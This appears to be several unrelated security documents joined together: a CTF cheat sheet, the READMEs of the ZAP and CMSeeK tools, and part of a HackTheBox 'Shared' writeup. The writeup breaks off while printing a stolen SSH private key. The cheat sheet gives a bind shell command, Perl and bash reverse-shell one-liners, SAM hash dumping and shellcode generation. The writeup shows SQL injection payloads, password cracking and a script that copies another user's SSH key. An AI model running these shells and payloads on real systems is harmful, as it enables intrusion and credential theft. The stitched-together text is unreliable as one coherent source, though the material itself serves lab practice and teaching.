<NETWORK> ``` All Port scan with All Scanning including OS, Version, Script and Traceroute. ``` > $ nmap -T4 -A -p- <NETWORK> ``` To scan for UDP Ports (Dont scan all scans, as it takes lot of time). ``` > $ nmap -sU -T4 <NETWORK> ``` ### Payloads Non Staged Payload Example. ``` windows/meterpreter_reverse_tcp ``` Staged Payload Example. ``` windows/meterpreter/reverse_tcp ``` ### Shells To use bind shell, we have to follow two steps: 1, Create a Bind Shell 2,Listen for connection. ``` > $ nc <ATTACKER_IP> <ATTACKET_PORT>` ``` ``` > $ nc -lvp <ATTACKER_PORT> ``` If website is launching perl reverse shell, we can modify it to get better shell using Bash oneliner. ``` > $ perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"<HOST_IP>:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};' 2>&1 ``` ``` > $ bash -c 'bash -i &> /dev/tcp/<HOST_IP>/9001 0>&1' ``` ### BufferOverflow To generate shellcode quickly, we can use python `pwn` library. ``` > $ python -c "import pwn;print(pwn.asm(pwn.shellcraft.linux.sh)) ``` ``` > $ (python -c "import pwn;print(pwn.asm(pwn.shellcraft.linux.sh()))" ;cat) | ./vuln ``` ### Gobuster Normal Enumeration. ``` > $ gobuster dir -u http://<IP_ADDRESS> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt ``` With Cookie (Useful to directory traversal when cookie is needed). ``` > $ gobuster dir -u http://<IP_ADDRESS> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -c PHPSESSID=<COOKIE_VALUE> =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://<IP_ADDRESS> [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] Cookies: <COOKIE_VALUE> [+] User Agent: gobuster/3.0.1 [+] Extensions: php [+] Timeout: 10s =============================================================== 2020/04/19 01:43:01 Starting gobuster =============================================================== /home.php (Status: 302) /index.php (Status: 200) ``` ### SQLMAP Redirect the HTTP Request to Burpsuite and we can see the request like this. ``` POST / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://<IP_ADDRESS>/ Content-Type: application/x-www-form-urlencoded Content-Length: 11 Connection: close Upgrade-Insecure-Requests: 1 search=help ``` Now Right click and click on `copy to file` option. ``` > $ sqlmap -r search.req --batch --force-ssl ___ __H__ ___ ___[,]_____ ___ ___ {1.4.3#stable} |_ -| . ["] | .'| . | |___|_ [.]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 01:25:16 /2020-04-19/ [01:25:16] [INFO] parsing HTTP request from 'search.req' [01:25:17] [INFO] testing connection to the target URL [01:25:17] [INFO] checking if the target is protected by some kind of WAF/IPS [01:25:17] [INFO] testing if the target URL content is stable [01:25:18] [INFO] target URL content is stable [01:25:18] [INFO] testing if POST parameter 'search' is dynamic [01:25:18] [WARNING] POST parameter 'search' does not appear to be dynamic [01:25:18] [WARNING] heuristic (basic) test shows that POST parameter 'search' might not be injectable [01:25:19] [INFO] testing for SQL injection on POST parameter 'search' [01:25:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [01:25:20] [INFO] testing 'Boolean-based blind - Parameter replace (original value)' [01:25:21] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [01:25:22] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' ``` ## File Hacking ### Extract hidden text from PDF Files If something is hidden on a pdf which we need to find, we can Press `Ctrl + A` to copy everything on the pdf and paste on notepad. If nothing is found, we can use [Inkspace tool](https://inkscape.org) to paste the pdf and try to ungroup several times to extract any hidden flag. Else solve using pdf-uncompress tools like `qpdf` to convert compressed data to redeable format. ### Compress File Extraction If there is `PK` at the start of the file in the magic bytes, its most probably `ZIP` File. To extract data from recursive zip file. ``` > $ binwalk -Me <FILE_NAME> ``` ### Extract hidden strings If file is having some hidden text, we can use `hexeditor` or `strings` commands to locate the flag. If hidden text has == at the end, it is `base64` encoded. To monitor the appplication calls of a binary. ``` > $ strace -s -f 12345 -e trace=recv,read <PROGRAM> ``` To track all Application & library calls of a program. ``` > $ ltrace ./<PROG_NAME> ``` ## Cryptography ### Caesar Cipher If there is word `caesar` in the question or hint, it can be a substitution cipher. If you find `!` in the cipher text and cipher seems to be within certain range of Letters and appears to be transposition of a plain text, Use this website [Ceasar Box](https://www.dcode.fr/caesar-box-cipher) to Bruteforce the hidden message. ### Vigenere Cipher To break Vigenere ciphers without knowing the key. - Use this website [Link](https://www.guballa.de/vigenere-solver) - Bruteforce solver. ### One Time Pad Cipher To solve One Time Pad, Use [OTP](http://rumkin.com/tools/cipher/otp.php). ``` > $ /usr/share/john/ssh2john.py id_rsa > output.hash ``` ## Forensics ### Image File Try `file` comamnd on the image to learn more information. To extract data inside Image files. ``` > $ zsteg <FILE_NAME> ``` To check for metadata of the Image files. ``` > $ exiftool <FILE_NAME> ``` To search for particular string or flag in an Image file. ``` > $ strings <FILE_NAME> | grep flag{ ``` To extract data hidden inside an image file protected with password. ``` > $ steghide extract -sf <FILE_NAME> ``` ### Binwalk Binwalk helps to find data inside the image or sometimes if binwalk reports as zip Archive, we can rename the file to <FILE_NAME>.zip to find interesting data. ``` > $ binwalk <IMAGE_NAME> ``` ### Extract NTFS Filesystem ``` If there is ntfs file, extract with 7Zip on Windowds. If there is a file with alternative data strems, we can use the command `dir /R <FILE_NAME>`. Then we can this command to extract data inside it `cat <HIDDEN_STREAM> > asdf.<FILE_TYPE>` ``` To extract ntfs file system on Linux. ``` > $ sudo mount -o loop <FILENAME.ntfs> mnt ``` ### Recover Files from Deleted File Systems To Recover Files from Deleted File Systems from Remote Hosts. ``` > $ ssh username@remote_address "sudo dcfldd -if=/dev/sdb | gzip -1 ." | dcfldd of=extract.dd.gz > $ gunzip -d extract.dd.gz > $ binwalk -Me extract.dd ``` ### Packet Capture If usb keys are mapped with pcap, we can use this Article to extract usb keys entered: [Link](https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4) ``` > $ tskark.exe -r <FILE_NAME.pcapng> -Y "usb.transfer_types==1" -e "frame.time.epoch" -e "usb.capdata" -Tfields ``` ### JavaScript Deobfuscator To Deobfuscate JavaScript, use [Jsnice](http://www.jsnice.org/). ## Password Cracking ### JOHN the ripper If there is `JOHN` in the title or text or hint, its mostly reference to `JOHN the ripper` for bruteforce passwords/hashes. ``` > $ john <HASHES_FILE> --wordlist=/usr/share/wordlists/rockyou.txt ``` To crack well known hashes, use [Link](https://crackstation.net/) ### SAM Hashes To get System User Hashes, we can follow this method. ``` > $ /mnt/vhd/Windows/System32/config# cp SAM SYSTEM ~/CTF/ > $ /mnt/vhd/Windows/System32/config# cd ~/CTF/ > ~/CTF# ls SAM SYSTEM > ~/CTF# mkdir Backup_dump > ~/CTF# mv SAM SYSTEM Backup_dump/ > ~/CTF# cd Backup_dump/ > ~/CTF/Backup_dump# ls SAM SYSTEM > ~/CTF/Backup_dump# impacket-secretsdump -sam SAM -system SYSTEM local Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation [*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: User:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9::: [*] Cleaning up... ``` ### Linux User Hashes If we able to extract /etc/passwd and /etc/shadow file we can use `unshadow` ``` > $ unshadow <PASSWD> <SHADOW> ``` ### Hashcat To crack the password, we can use `hashcat` here 500 is for format `$1$` Replace it accordingly. ``` > $ hashcat -m 500 -a 0 -o cracked.txt hashes.txt /usr/share/wordlists/rockyou.txt --force ``` ### 7z Password Cracking To extract 7z password, Use tool `7z2john` ### SSH Password Cracking To crack encrypted ssh key use `ssh2john` tool. ## Privilige Escalation ### Standard Scripts for Enumeration - [Linux Priv Checker](https://github.com/sleventyeleven/linuxprivchecker) - Linux Privilige Enumeration Checker. - [Awesome Priv](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) - [Lin Enum Script](https://github.com/rebootuser/LinEnum) - [Unix Priv Check](https://github.com/pentestmonkey/unix-privesc-check) - [Pspy](https://github.com/DominicBreuker/pspy) - Information on cronjobs, proceses on target system. - [JAWS](https://github.com/411Hall/JAWS) - Windows Enumeration Script. - [Cyberchef](https://github.com/gchq/CyberChef) - A web app for encryption, encoding, compression and data analysis. ### Reconnoitre Security tool for multithreaded information gathering and service enumeration whilst building directory structures to store results, along with writing out recommendations for further testing. - [Link](https://github.com/codingo/Reconnoitre) ``` > $ reconnoitre -t 10.10.10.37 -o `pwd` --services` ```
# [![](https://raw.githubusercontent.com/wiki/zaproxy/zaproxy/images/zap32x32.png) ZAP](https://www.zaproxy.org) [![License](https://img.shields.io/badge/license-Apache%202-4EB1BA.svg)](https://www.apache.org/licenses/LICENSE-2.0.html) [![GitHub release](https://img.shields.io/github/release/zaproxy/zaproxy.svg)](https://www.zaproxy.org/download/) [![Java CI](https://github.com/zaproxy/zaproxy/actions/workflows/ci.yml/badge.svg)](https://github.com/zaproxy/zaproxy/actions/workflows/ci.yml) [![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/24/badge)](https://bestpractices.coreinfrastructure.org/projects/24) [![Github Releases](https://img.shields.io/github/downloads/zaproxy/zaproxy/latest/total.svg?maxAge=2592000)](https://zapbot.github.io/zap-mgmt-scripts/downloads.html) [![javadoc](https://javadoc.io/badge2/org.zaproxy/zap/javadoc.svg)](https://javadoc.io/doc/org.zaproxy/zap) [![CodeQL](https://github.com/zaproxy/zaproxy/actions/workflows/codeql.yml/badge.svg)](https://github.com/zaproxy/zaproxy/actions/workflows/codeql.yml) [![Quality Gate Status](https://sonarcloud.io/api/project_badges/measure?project=zaproxy_zaproxy&metric=alert_status)](https://sonarcloud.io/dashboard?id=zaproxy_zaproxy) [![Open Source Helpers](https://www.codetriage.com/zaproxy/zaproxy/badges/users.svg)](https://www.codetriage.com/zaproxy/zaproxy) [![Twitter Follow](https://img.shields.io/twitter/follow/zaproxy.svg?style=social&label=Follow&maxAge=2592000)](https://twitter.com/zaproxy) ![Integration Tests](https://github.com/zaproxy/zaproxy/actions/workflows/run-integration-tests.yml/badge.svg) ![Docker Live Release](https://github.com/zaproxy/zaproxy/actions/workflows/release-live-docker.yml/badge.svg) The Zed Attack Proxy (ZAP) is one of the world’s most popular free security tools and is actively maintained by a dedicated international team of volunteers. It can help you automatically find security vulnerabilities in your web applications while you are developing and testing your applications. It's also a great tool for experienced pentesters to use for manual security testing. [![](https://raw.githubusercontent.com/wiki/zaproxy/zaproxy/images/ZAP-Download.png)](https://www.zaproxy.org/download/) For more details about ZAP see the new ZAP website at [zaproxy.org](https://www.zaproxy.org/) [![](https://raw.githubusercontent.com/wiki/zaproxy/zaproxy/images/zap-website.png)](https://www.zaproxy.org/)
<p align='center'> <img src="https://i.imgur.com/5VYs1m2.png" alt="Logo"> <br> <a href="https://github.com/Tuhinshubhra/CMSeeK/releases/tag/v.1.1.2"><img src="https://img.shields.io/badge/Version-1.1.2-brightgreen.svg?style=style=flat-square" alt="version"></a> <a href="https://github.com/Tuhinshubhra/CMSeeK/"><img src="https://img.shields.io/badge/python-3-orange.svg?style=style=flat-square" alt="Python Version"></a> <a href="https://github.com/Tuhinshubhra/CMSeeK/stargazers"><img src="https://img.shields.io/github/stars/Tuhinshubhra/CMSeeK.svg" alt="GitHub stars" /></a> <a href="https://github.com/Tuhinshubhra/CMSeeK/blob/master/LICENSE"><img src="https://img.shields.io/github/license/Tuhinshubhra/CMSeeK.svg" alt="GitHub license" /></a> <a href="https://inventory.rawsec.ml/tools.html#CMSeek"><img src="https://inventory.rawsec.ml/img/badges/Rawsec-inventoried-FF5050_flat.svg" alt="Rawsec's CyberSecurity Inventory" /></a> <a href="https://twitter.com/r3dhax0r"><img src="https://img.shields.io/twitter/url/https/github.com/Tuhinshubhra/CMSeeK.svg?style=social" alt="Twitter" /></a> </p> ## What is a CMS? > A content management system (CMS) manages the creation and modification of digital content. It typically supports multiple users in a collaborative environment. Some noteable examples are: *WordPress, Joomla, Drupal etc*. ## Release History ``` - Version 1.1.2 [19-05-2019] - Version 1.1.1 [01-02-2019] - Version 1.1.0 [28-08-2018] - Version 1.0.9 [21-08-2018] - Version 1.0.8 [14-08-2018] - Version 1.0.7 [07-08-2018] ... ``` [Changelog File](https://github.com/Tuhinshubhra/CMSeeK/blob/master/CHANGELOG) ## Functions Of CMSeek: - Basic CMS Detection of over 170 CMS - Drupal version detection - Advanced Wordpress Scans - Detects Version - User Enumeration - Plugins Enumeration - Theme Enumeration - Detects Users (3 Detection Methods) - Looks for Version Vulnerabilities and much more! - Advanced Joomla Scans - Version detection - Backup files finder - Admin page finder - Core vulnerability detection - Directory listing check - Config leak detection - Various other checks - Modular bruteforce system - Use pre made bruteforce modules or create your own and integrate with it ## Requirements and Compatibility: CMSeeK is built using **python3**, you will need python3 to run this tool and is compitable with **unix based systems** as of now. Windows support will be added later. CMSeeK relies on **git** for auto-update so make sure git is installed. ## Installation and Usage: It is fairly easy to use CMSeeK, just make sure you have python3 and git (just for cloning the repo) installed and use the following commands: - git clone `https://github.com/Tuhinshubhra/CMSeeK` - cd CMSeeK - pip/pip3 install -r requirements.txt For guided scanning: - python3 cmseek.py Else: - python3 cmseek.py -u <target_url> [...] Help menu from the program: ``` USAGE: python3 cmseek.py (for guided scanning) OR python3 cmseek.py [OPTIONS] <Target Specification> SPECIFING TARGET: -u URL, --url URL Target Url -l LIST, --list LIST Path of the file containing list of sites for multi-site scan (comma separated) MANIPULATING SCAN: -i cms, --ignore--cms cms Specify which CMS IDs to skip in order to avoid flase positive. separated by comma "," --strict-cms cms Checks target against a list of provided CMS IDs. separated by comma "," --skip-scanned Skips target if it's CMS was previously detected. RE-DIRECT: --follow-redirect Follows all/any redirect(s) --no-redirect Skips all redirects and tests the input target(s) USER AGENT: -r, --random-agent Use a random user agent --googlebot Use Google bot user agent --user-agent USER_AGENT Specify a custom user agent OUTPUT: -v, --verbose Increase output verbosity VERSION & UPDATING: --update Update CMSeeK (Requires git) --version Show CMSeeK version and exit HELP & MISCELLANEOUS: -h, --help Show this help message and exit --clear-result Delete all the scan result EXAMPLE USAGE: python3 cmseek.py -u example.com # Scan example.com python3 cmseek.py -l /home/user/target.txt # Scan the sites specified in target.txt (comma separated) python3 cmseek.py -u example.com --user-agent Mozilla 5.0 # Scan example.com using custom user-Agent Mozilla is 5.0 used here python3 cmseek.py -u example.com --random-agent # Scan example.com using a random user-Agent python3 cmseek.py -v -u example.com # enabling verbose output while scanning example.com ``` ## Checking For Update: You can check for update either from the main menu or use `python3 cmseek.py --update` to check for update and apply auto update. P.S: Please make sure you have `git` installed, CMSeeK uses git to apply auto update. ## Detection Methods: CMSeek detects CMS via the following: - HTTP Headers - Generator meta tag - Page source code - robots.txt ## Supported CMSs: CMSeeK currently can detect **170+** CMS. Check the list here: [cmss.py](https://github.com/Tuhinshubhra/CMSeeK/blob/master/cmseekdb/cmss.py) file which is present in the `cmseekdb` directory. All the cmss are stored in the following way: ``` cmsID = { 'name':'Name Of CMS', 'url':'Official URL of the CMS', 'vd':'Version Detection (0 for no, 1 for yes)', 'deeps':'Deep Scan (0 for no 1 for yes)' } ``` ## Scan Result: All of your scan results are stored in a json file named `cms.json`, you can find the logs inside the `Result\<Target Site>` directory, and as of the bruteforce results they're stored in a txt file under the site's result directory as well. Here is an example of the json report log: ![Json Log](https://i.imgur.com/5dA9jQg.png) ## Bruteforce Modules: CMSeek has a modular bruteforce system meaning you can add your custom made bruteforce modules to work with cmseek. A proper documentation for creating modules will be created shortly but in case you already figured out how to (pretty easy once you analyze the pre-made modules) all you need to do is this: 1. Add a comment exactly like this `# <Name Of The CMS> Bruteforce module`. This will help CMSeeK to know the name of the CMS using regex 2. Add another comment `### cmseekbruteforcemodule`, this will help CMSeeK to know it is a module 3. Copy and paste the module in the `brutecms` directory under CMSeeK's directory 4. Open CMSeeK and Rebuild Cache using `R` as the input in the first menu. 5. If everything is done right you'll see something like this (refer to screenshot below) and your module will be listed in bruteforce menu the next time you open CMSeeK. <p align='center'> <img alt="Cache Rebuild Screenshot" width="600px" src="https://i.imgur.com/yhdzTYr.png" /> </p> ## Need More Reasons To Use CMSeeK? If not anything you can always enjoy exiting CMSeeK *(please don't)*, it will bid you goodbye in a random goodbye message in various languages. Also you can try reading comments in the code those are pretty random and weird!!! ## Screenshots: <p align="center"> <img alt="Main Menu" src="https://i.imgur.com/Eij6QvX.png" /> <br><em>Main Menu</em><br> <img alt="Scan Result" src="https://i.imgur.com/u0iyLdB.png" /> <br><em>Scan Result</em><br> <img alt="WordPress Scan Result" src="https://i.imgur.com/cOtCJLj.png" /> <br><em>WordPress Scan Result</em><br> </p> ## Guidelines for opening an issue: Please make sure you have the following info attached when opening a new issue: - Target - Exact copy of error or screenshot of error - Your operating system and python version **Issues without these informations might not be answered!** ## Disclaimer: **Usage of CMSeeK for testing or exploiting websites without prior mutual consistency can be considered as an illegal activity. It is the final user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program.** ## License: CMSeeK is licensed under [GNU General Public License v3.0](https://github.com/Tuhinshubhra/CMSeeK/blob/master/LICENSE) ## Follow Me @r3dhax0r: [Twitter](https://twitter.com/r3dhax0r) ## Team: [Team : Virtually Unvoid Defensive (VUD)](https://twitter.com/virtuallyunvoid)
# Shared - HackTheBox - Writeup Linux, 30 Base Points, Medium ![info.JPG](images/info.JPG) ## Machine ![‏‏Shared.JPG](images/Shared.JPG) ## TL;DR To solve this machine, we begin by enumerating open services using ```namp``` – finding ports ```22```, ```80```, and ```443```. ***User***: Found subdomain ```checkout.shared.htb``` with SQLi vulnerability, Using SQLi we get the password MD5 hash of ```james_mason``` user, By running ```pspy64``` we found that ```dan_smith``` runs ```ipython``` from ```/opt/scripts_review``` directory (we can write to this directory), Using ```CVE-2022-21699``` we get the SSH private key of ```dan_smith``` user. ***Root***: Found the binary ```/usr/local/bin/redis_connector_dev```, Run it locally and we get the password of ```redis-cli```, Using ```CVE-2022-0543``` we get RCE as ```root```. ![pwn.JPG](images/pwn.JPG) ## Shared Solution ### User Let's start with ```nmap``` scanning: ```console ┌─[evyatar@parrot]─[/hackthebox/Shared] └──╼ $ nmap -sV -sC -oA nmap/Shared 10.10.11.172 Starting Nmap 7.80 ( https://nmap.org ) at 2022-07-29 15:53 IDT Nmap scan report for 10.10.11.172 Host is up (0.21s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) 80/tcp open http nginx 1.18.0 |_http-server-header: nginx/1.18.0 |_http-title: Did not follow redirect to http://shared.htb 443/tcp open ssl/http nginx 1.18.0 |_http-server-header: nginx/1.18.0 |_http-title: Did not follow redirect to https://shared.htb | ssl-cert: Subject: commonName=*.shared.htb/organizationName=HTB/stateOrProvinceName=None/countryName=US | Not valid before: 2022-03-20T13:37:14 |_Not valid after: 2042-03-15T13:37:14 | tls-alpn: | h2 |_ http/1.1 | tls-nextprotoneg: | h2 |_ http/1.1 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` By observing port ```80``` we get the following web page (we are redirected to port ```443```): ![port80.JPG](images/port80.JPG) We can see the hint about the new checkout process. By enumerating the website we can see the following checkout page [https://checkout.shared.htb/](https://checkout.shared.htb/) (We need to add an item to the cart before and then process the payment): ![checkout.JPG](images/checkout.JPG) Let's see the page cookies: ```http Cookie: PrestaShop-5f7b4f27831ed69a86c734aa3c67dd4c=def50200c8530021b349b9b21e18e0d511e0e7020ffd4da4d2e7eb439a05a4dcfbd21e95781115de19c511ae44543b683dee60751aec6fde4926615b9fe5473f7b26719a30ff7624b87820a8b29eb30930c1e15ee0ed3fda47f4f250eb1cfa92cba414959fa57b54a8950840c799e4de8ff4f2f9f70fb9d730c6433abc989ae191ecbe0ca00c105dc32b212793eb47dbdd247e5ba9dcc6f6c60429c4c3ed367c827bdb20b1cfa51946b2aab9421f110de16dc22d5dc2f6e24d6994d46c4364415b70be2ac021bd983e133d233868999efec34bc09c85a1351422896b76fbe907616af218ccfe0eabebe92709b7d150396cbee84d39662830a8f5ed1eb73addc3a4cda73aa9b929853b7e1cd2a77320e9b9ecbb22945eb17ceb0f8467efab; custom_cart=%7B%22YCS98E4A%22%3A%221%22%7D ``` We can see the cookie ```custom_cart```: ```http custom_cart=%7B%22YCS98E4A%22%3A%221%22%7D ``` By decoding it we get: ```json {"YCS98E4A":"1"} ``` Where ```YCS98E4A``` is the product, meaning that the query looks like ```select X from Y where product='YCS98E4A'```. After a little research we found we can get the table name using the following query ```{"' and 0=1 union select 1,table_name,table_schema from information_schema.tables where table_schema='checkout'-- -":"1"}```: ![table.JPG](images/table.JPG) And by using the following query we can get the user name: ```{"' and 0=1 union select 1,username,2 from checkout.user-- -":"1"}```: ![username.JPG](images/username.JPG) And by the following query we can get the password ```{"' and 0=1 union select 1,password,2 from checkout.user-- -":"1"}```: ![password.JPG](images/password.JPG) Let's try to crack the hash ```fc895d4eddc2fc12f995e18c865cf273``` using ```john```: ```console ┌─[evyatar@parrot]─[/hackthebox/Shared] └──╼ $ john --wordlist=rockyou.txt hash --format=Raw-MD5 Using default input encoding: UTF-8 Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3]) Warning: no OpenMP support for this hash type, consider --fork=4 Press 'q' or Ctrl-C to abort, almost any other key for status Soleil101 (?) 1g 0:00:00:00 DONE (2022-08-12 00:02) 5.555g/s 11616Kp/s 11616Kc/s 11616KC/s Sports5..Soccer95 Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably Session completed ``` Let's try the password ```Soleil101``` using ```SSH```: ```console ┌─[evyatar@parrot]─[/hackthebox/Shared] └──╼ $ ssh [email protected] The authenticity of host 'shared.htb (10.10.11.172)' can't be established. ECDSA key fingerprint is SHA256:mjIWp2Ggy1NHLY33FSfsXXVTUxbD+W30zEbd7BvHopg. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 'shared.htb,10.10.11.172' (ECDSA) to the list of known hosts. [email protected]'s password: Linux shared 5.10.0-16-amd64 #1 SMP Debian 5.10.127-1 (2022-06-30) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Thu Jul 14 14:45:22 2022 from 10.10.14.4 james_mason@shared:~$ ls james_mason@shared:~$ ``` As we can see, We don't have the user flag here, The user flag is on ```dan_smith``` user: ```console james_mason@shared:~$ ls ../dan_smith/ user.txt ``` Let's try to get this user. By running [pspy64](https://github.com/DominicBreuker/pspy) we can see the following: ```console ... 2022/08/11 17:31:01 CMD: UID=0 PID=13438 | /bin/bash /root/c.sh 2022/08/11 17:31:01 CMD: UID=1001 PID=13440 | /bin/sh -c /usr/bin/pkill ipython; cd /opt/scripts_review/ && /usr/local/bin/ipython 2022/08/11 17:31:01 CMD: UID=1001 PID=13441 | /usr/bin/pkill ipython ... ``` Let's check who is ```1001```: ```console james_mason@shared:/opt/scripts_review$ cat /etc/passwd | grep 1001 dan_smith:x:1001:1002::/home/dan_smith:/bin/bash ``` So we can see that ```dan_smith``` runs ```ipython``` from ```/opt/scripts_review/``` directory, we can write to this directory. By research, we found [CVE-2022-21699](https://github.com/ipython/ipython/security/advisories/GHSA-pq7m-3gw7-gq5x). Let's use it: ```console james_mason@shared:/opt/scripts_review$ mkdir -m 777 profile_default james_mason@shared:/opt/scripts_review$ cd profile_default/ james_mason@shared:/opt/scripts_review/profile_default$ mkdir -m 777 startup james_mason@shared:/opt/scripts_review/profile_default$ cd startup/ james_mason@shared:/opt/scripts_review/profile_default/startup$ cp /tmp/test.py . ``` Where ```test.py``` write the private SSH key of ```dan_smith``` to ```/tmp```: ```python with open('/home/dan_smith/.ssh/id_rsa','r') as f: r = f.read() with open('/tmp/.test','w') as t: t.write(r) ``` And on the next running of ```ipython``` we can see the following file on ```/tmp```: ```console james_mason@shared:/opt/scripts_review$ cat /tmp/.test -----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn NhAAAAAwEAAQAAAYEAvWFkzEQw9usImnZ7ZAzefm34r+54C9vbjymNl4pwxNJPaNSHbdWO +/+OPh0/KiPg70GdaFWhgm8qEfFXLEXUbnSMkiB7JbC3fCfDCGUYmp9QiiQC0xiFeaSbvZ FwA4NCZouzAW1W/ZXe60LaAXVAlEIbuGOVcNrVfh+XyXDFvEyre5BWNARQSarV5CGXk6ku sjib5U7vdKXASeoPSHmWzFismokfYy8Oyupd8y1WXA4jczt9qKUgBetVUDiai1ckFBePWl 4G3yqQ2ghuHhDPBC+lCl3mMf1XJ7Jgm3sa+EuRPZFDCUiTCSxA8LsuYrWAwCtxJga31zWx FHAVThRwfKb4Qh2l9rXGtK6G05+DXWj+OAe/Q34gCMgFG4h3mPw7tRz2plTRBQfgLcrvVD oQtePOEc/XuVff+kQH7PU9J1c0F/hC7gbklm2bA8YTNlnCQ2Z2Z+HSzeEXD5rXtCA69F4E u1FCodLROALNPgrAM4LgMbD3xaW5BqZWrm24uP/lAAAFiPY2n2r2Np9qAAAAB3NzaC1yc2 EAAAGBAL1hZMxEMPbrCJp2e2QM3n5t+K/ueAvb248pjZeKcMTST2jUh23Vjvv/jj4dPyoj 4O9BnWhVoYJvKhHxVyxF1G50jJIgeyWwt3wnwwhlGJqfUIokAtMYhXmkm72RcAODQmaLsw FtVv2V3utC2gF1QJRCG7hjlXDa1X4fl8lwxbxMq3uQVjQEUEmq1eQhl5OpLrI4m+VO73Sl wEnqD0h5lsxYrJqJH2MvDsrqXfMtVlwOI3M7failIAXrVVA4motXJBQXj1peBt8qkNoIbh 4QzwQvpQpd5jH9VyeyYJt7GvhLkT2RQwlIkwksQPC7LmK1gMArcSYGt9c1sRRwFU4UcHym +EIdpfa1xrSuhtOfg11o/jgHv0N+IAjIBRuId5j8O7Uc9qZU0QUH4C3K71Q6ELXjzhHP17 lX3/pEB+z1PSdXNBf4Qu4G5JZtmwPGEzZZwkNmdmfh0s3hFw+a17QgOvReBLtRQqHS0TgC zT4KwDOC4DGw98WluQamVq5tuLj/5QAAAAMBAAEAAAGBAK05auPU9BzHO6Vd/tuzUci/ep wiOrhOMHSxA4y72w6NeIlg7Uev8gva5Bc41VAMZXEzyXFn8kXGvOqQoLYkYX1vKi13fG0r SYpNLH5/SpQUaa0R52uDoIN15+bsI1NzOsdlvSTvCIUIE1GKYrK2t41lMsnkfQsvf9zPtR 1TA+uLDcgGbHNEBtR7aQ41E9rDA62NTjvfifResJZre/NFFIRyD9+C0az9nEBLRAhtTfMC E7cRkY0zDSmc6vpn7CTMXOQvdLao1WP2k/dSpwiIOWpSLIbpPHEKBEFDbKMeJ2G9uvxXtJ f3uQ14rvy+tRTog/B3/PgziSb6wvHri6ijt6N9PQnKURVlZbkx3yr397oVMCiTe2FA+I/Y pPtQxpmHjyClPWUsN45PwWF+D0ofLJishFH7ylAsOeDHsUVmhgOeRyywkDWFWMdz+Ke+XQ YWfa9RiI5aTaWdOrytt2l3Djd1V1/c62M1ekUoUrIuc5PS8JNlZQl7fyfMSZC9mL+iOQAA AMEAy6SuHvYofbEAD3MS4VxQ+uo7G4sU3JjAkyscViaAdEeLejvnn9i24sLWv9oE9/UOgm 2AwUg3cT7kmKUdAvBHsj20uwv8a1ezFQNN5vxTnQPQLTiZoUIR7FDTOkQ0W3hfvjznKXTM wictz9NZYWpEZQAuSX2QJgBJc1WNOtrgJscNauv7MOtZYclqKJShDd/NHUGPnNasHiPjtN CRr7thGmZ6G9yEnXKkjZJ1Neh5Gfx31fQBaBd4XyVFsvUSphjNAAAAwQD4Yntc2zAbNSt6 GhNb4pHYwMTPwV4DoXDk+wIKmU7qs94cn4o33PAA7ClZ3ddVt9FTkqIrIkKQNXLQIVI7EY Jg2H102ohz1lPWC9aLRFCDFz3bgBKluiS3N2SFbkGiQHZoT93qn612b+VOgX1qGjx1lZ/H I152QStTwcFPlJ0Wu6YIBcEq4Rc+iFqqQDq0z0MWhOHYvpcsycXk/hIlUhJNpExIs7TUKU SJyDK0JWt2oKPVhGA62iGGx2+cnGIoROcAAADBAMMvzNfUfamB1hdLrBS/9R+zEoOLUxbE SENrA1qkplhN/wPta/wDX0v9hX9i+2ygYSicVp6CtXpd9KPsG0JvERiVNbwWxD3gXcm0BE wMtlVDb4WN1SG5Cpyx9ZhkdU+t0gZ225YYNiyWob3IaZYWVkNkeijRD+ijEY4rN41hiHlW 